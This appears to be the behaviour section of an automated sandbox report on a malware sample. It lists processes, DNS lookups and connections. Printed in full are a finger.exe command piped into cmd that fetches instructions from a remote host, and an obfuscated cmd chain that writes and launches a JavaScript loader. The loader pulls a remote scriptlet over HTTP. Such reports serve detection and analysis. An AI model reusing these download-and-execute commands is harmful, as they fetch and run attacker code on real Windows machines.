Technical Information
- '<SYSTEM32>\finger.exe' ok@pir1sjxai89.docmaster.email
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\4KG.js"
- C:\users\public\4kg.js
- 'pi######i89.docmaster.email':79
- 'by#######m9.plonoster21.trade':80
- 'cl###flare.com':443
- 'microsoft.com':80
- DNS ASK pi######i89.docmaster.email
- DNS ASK by#######m9.plonoster21.trade
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger.exe ok@pir1sjxai89.docmaster.email |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "Set ESJK=.j&&sET QUMRO=vFxaiarFxai a =Fxai 'scFxairiFxaiptFxai:'; b =Fxai 'hFxaiTtPFxai:'; GFxaietFxaiObjFxaiecFxait(Fxaia+b+'&&sET WEL5=PTBJCPTBJCbyosw2foom9.plonoster21.tradePTBJC?1PT...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p OGAAU="%QUMRO:Fxai=%%WEL5:PTBJC=/%" 0<nul 1>C:\Users\Public\4KG%ESJK%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\4KG%ESJK%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\4KG.js